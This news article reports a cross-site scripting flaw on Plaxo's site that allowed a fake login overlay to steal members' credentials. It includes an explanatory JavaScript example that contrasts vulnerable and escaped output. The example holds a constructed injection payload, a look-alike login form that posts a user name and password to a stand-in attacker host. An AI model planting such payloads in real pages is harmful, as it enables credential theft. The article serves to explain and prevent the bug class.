Plaxo plugs phishing vulnerability

Plaxo has plugged a gaping security hole in its Web site that could have exposed its members' online address books

Online contacts management company Plaxo plugged a serious security hole in its Web site on Monday that left its members' contact lists vulnerable to be stolen, modified or deleted.

With more than two million users, Plaxo is one of the most popular online address book companies. It stores its members' contacts in a central database and provides access to them over the Internet. The service allows its members to invite contacts to update their own information, helping users keep their address books up to date.

The security flaw, which was discovered by Web application security company Lodoga, was reported to Plaxo on Monday evening. Lodoga's security test engineer Jeremy Wood told ZDNet UK it took him less than an hour after discovering the weakness to build an attack script that could exploit the vulnerability.

Wood demonstrated the attack script to ZDNet UK. Using the live Plaxo Web site, Wood's script added an additional layer over the username and password box. With this layer in place, if a user typed in their access details, the information would first be sent to the attacker's Web site and then to Plaxo to log the user in. Users would have had no idea their details had been taken.

"We are using a vulnerable field on the front page of Plaxo to specifically overlay their user ID form with something called a 'Div' -- a Javascript element that is a layer. If you place a layer on top of a Web page, you can colour it the same and make it present the same information," said Wood.

Wood explained that because the additional layer was delivered as part of the genuine Plaxo page, its members would not be able to tell the difference, even though the site was served over SSL. Clicking on the padlock displayed on the browser would show the Web site as genuine despite its modification: the padlock vouches for the connection to Plaxo's server and its certificate, not for the content of the page, and the injected layer arrived inside that legitimately served page.

Plaxo's service is an ideal target for phishers. Any fraud would probably be delivered in the same way that criminals target bank customers, by sending a user an email asking them to click on a specially crafted hyperlink that would lead them to a doctored page. Banks can tell their customers to ignore such emails, but Plaxo's users need to send and receive emails to invite contacts to click on a link and update their details.

"The whole Plaxo environment is built around trust and sharing information, and you have seen how easily emails can be spoofed. This attack is designed to create victims, but more importantly, not allow them to know they have become victims," said Wood.

Rikk Carey, vice president of engineering at Plaxo, told ZDNet UK that the Web site was fixed a few hours after the problem was highlighted and he was "fairly certain" that the vulnerability had not been exploited by anyone except Lodoga's security testing.

"It required the evildoer to trick the victim into clicking on a URL controlled by the evildoer. This URL adds some extra HTML to the target Web site (and thus is actually happening on the target Web site), which can be used to steal the victim's password. The fix was minor and has been deployed," he said.

According to Lodoga's Wood, there are a large number of Web sites that have not programmed their applications to ensure that form fields only accept, and pages only emit, the kind of information those fields are designed to collect; a field meant for a name or a job title that will happily carry HTML and script is exactly what this attack relies on. This will be a real headache for businesses such as Plaxo that require the promiscuous exchange of emails between groups of contacts.
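To make the bug class concrete, here is an added example (not Plaxo's code, and not Lodoga's attack script) of a minimal server-side page template that reflects a user-supplied "business title" field into a page carrying a login form, first without encoding and then with HTML entity encoding on output. The hostnames, the field name and the overlay payload are all constructed for the illustration; the payload only follows the shape described above, an absolutely positioned layer holding a look-alike form, and there is no collection endpoint behind it.

```javascript
// Added example, not Plaxo's code. Hostnames are hypothetical.
const SITE_HOST = "www.example.invalid";    // hypothetical: the genuine site
const ATTACKER_HOST = "collector.invalid";  // hypothetical: attacker-controlled

// Page skeleton: a genuine login form followed by the reflected field. Anything
// injected here is served from the same origin, under the same SSL padlock.
function page(titleFragment) {
  return [
    "<html><body>",
    `<form action="https://${SITE_HOST}/login" method="post">`,
    '  <input name="user"><input name="pass" type="password">',
    "</form>",
    `<p>Business title: ${titleFragment}</p>`,
    "</body></html>",
  ].join("\n");
}

// Vulnerable: the field goes into the page exactly as it was received.
function renderVulnerable(title) {
  return page(title);
}

// Encode the five characters that change meaning inside element content.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed: output encoding on the way into the HTML. Same page, same data,
// but the browser now sees text rather than markup.
function renderFixed(title) {
  return page(escapeHtml(title));
}

// Defence in depth: a business title has no legitimate need for markup, so
// reject anything outside letters, digits and a little punctuation on input.
// This is an extra check, not a replacement for encoding on output.
function isPlausibleTitle(title) {
  return /^[\p{L}\p{N} .,'&\/-]{1,80}$/u.test(title);
}

// Constructed payload in the shape the article describes: a positioned layer
// carrying a look-alike login form that posts to the attacker's host.
const OVERLAY =
  '<div style="position:absolute;top:0;left:0;background:#fff">' +
  `<form action="https://${ATTACKER_HOST}/collect" method="post">` +
  '<input name="user"><input name="pass" type="password"></form></div>';

// Crude view of what a browser would build from the page: the action of every
// <form> tag that is present as live markup rather than as encoded text.
function formActions(html) {
  return [...html.matchAll(/<form\b[^>]*\baction="([^"]*)"/gi)].map((m) => m[1]);
}

console.log("vulnerable:", formActions(renderVulnerable(OVERLAY)));
console.log("fixed:     ", formActions(renderFixed(OVERLAY)));
console.log("rejected on input:", !isPlausibleTitle(OVERLAY));
```

Run with Node: the vulnerable rendering yields two forms, the genuine one and the injected one pointing at the attacker's host, while the fixed rendering yields only the genuine form and shows the payload as literal text. The encoding step is the actual fix; the allowlist on the title field is the "no scripting in a business title" rule applied on the way in, which catches the obvious cases but does not protect other fields or other output contexts.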

"Plaxo is not alone. We have been running workshops this month and every client we deal with has the same problem. Developers haven't really realised how robust they have to be in terms of security coding. This is probably the number one problem, and companies really are jeopardising their trade name and potentially their customers' data," added Wood.

Russ Cooper, founder and moderator of the NTBugtraq Newsletter and surgeon general at security company TruSecure, told ZDNet UK that Plaxo had been caught making a classic scripting error: "You shouldn’t be able to put scripting code into something that asks you for a business title," he said.